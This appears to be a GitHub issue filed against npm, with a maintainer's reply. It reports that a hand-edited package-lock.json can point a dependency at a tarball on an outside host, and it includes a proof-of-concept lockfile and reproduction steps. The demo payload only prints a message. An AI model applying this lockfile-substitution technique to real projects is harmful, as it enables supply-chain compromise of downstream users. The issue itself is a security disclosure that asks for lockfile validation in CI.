[BUG] Lockfile dependency injection

[hexnickk]

Is there an existing issue for this?

• I have searched the existing issues

This issue exists in the latest npm version

• I am using the latest npm

Current Behavior

This is a follow-up to these articles:

• Why npm lockfiles can be a security blindspot for injecting malicious modules.
• Injecting backdoors to NPM packages.

In short words, it's possible to manually update lockfile, so it will install a different package than listed in package.json.

package.json

{
  "name": "malicious-lockfile",
  "version": "1.0.0",
  "main": "index.js",
  "dependencies": {
    "is-number": "^7.0.0"
  }
}

package-lock.json

{
  "name": "malicious-lockfile",
  "version": "1.0.0",
  "lockfileVersion": 2,
  "requires": true,
  "packages": {
    "": {
      "name": "malicious-lockfile",
      "version": "1.0.0",
      "dependencies": {
        "is-number": "^7.0.0"
      }
    },
    "node_modules/is-number": {
      "version": "7.0.0",
      "resolved": "https://kozlovzxc.ru/static/is-number-7.0.0.tgz",
      "integrity": "sha512-VFNyA7hugXJ/lnZGGIPNLValf7+Woij3nfhZv27IGB2U/ytqDv/GwusnbS2MvswTTjct1HV5I+vBe7RVIoo+Cw==",
      "engines": {
        "node": ">=0.12.0"
      }
    }
  },
  "dependencies": {
    "is-number": {
      "version": "7.0.0",
      "resolved": "https://kozlovzxc.ru/static/is-number-7.0.0.tgz",
      "integrity": "sha512-VFNyA7hugXJ/lnZGGIPNLValf7+Woij3nfhZv27IGB2U/ytqDv/GwusnbS2MvswTTjct1HV5I+vBe7RVIoo+Cw=="
    }
  }
}

index.js

const isNumber = require("is-number");

console.log(isNumber(1));

console output

➜  npm git:(master) ✗ ls
index.js          package-lock.json package.json

➜  npm git:(master) ✗ npm install
added 1 package, and audited 2 packages in 909ms
found 0 vulnerabilities

➜  npm git:(master) ✗ node index.js
Hello world 🌎. (malicious package output)
true (expected output)

The issue is that for open source packages, PR updating lockfile may look like this:

So probably no one will ever look into this.

---

Related pnpm issue pnpm/pnpm#4361
Related yarn discussion yarnpkg/berry#4136

Expected Behavior

It would be nice to have some way to check validity of lock file, so users can run this validation as a part of CI checks.

Probably it's something not expected in most cases when package.json has list of packages, but actual path for one of them in lockfile is updated.

Steps To Reproduce

1. Install some package npm install is-number.
2. Copy sources cp node_modules/is-number assets.
3. Update sources to do something unusual, e.g. (console.log('hello world 🌎 ')).
4. Pack new package npm pack --json.
5. Distribute new package via http-server or publishing somewhere.
6. Update lockfile path & integrity.
7. Remove node_modules.
8. Install everything again npm install.
9. Run sample code (check example above).

Environment

• npm: 8.3.1
• Node.js: v17.4.0
• OS Name: MacOS Montrey
• System Model Name:
• npm config:

; "builtin" config from /usr/local/lib/node_modules/npm/npmrc

prefix = "/usr/local"

; node bin location = /usr/local/Cellar/node/17.4.0/bin/node
; cwd = /Users/kozlovzxc/Projects/reasearch-lockfiles/examples/npm
; HOME = /Users/kozlovzxc
; Run `npm config ls -l` to show all defaults.

[fritzy]

This is a feature request, so feel free to discuss it in the RFCS repo (https://github.com/npm/rfcs). I've opened an issue there for discussion. Please participate there. npm/rfcs#539.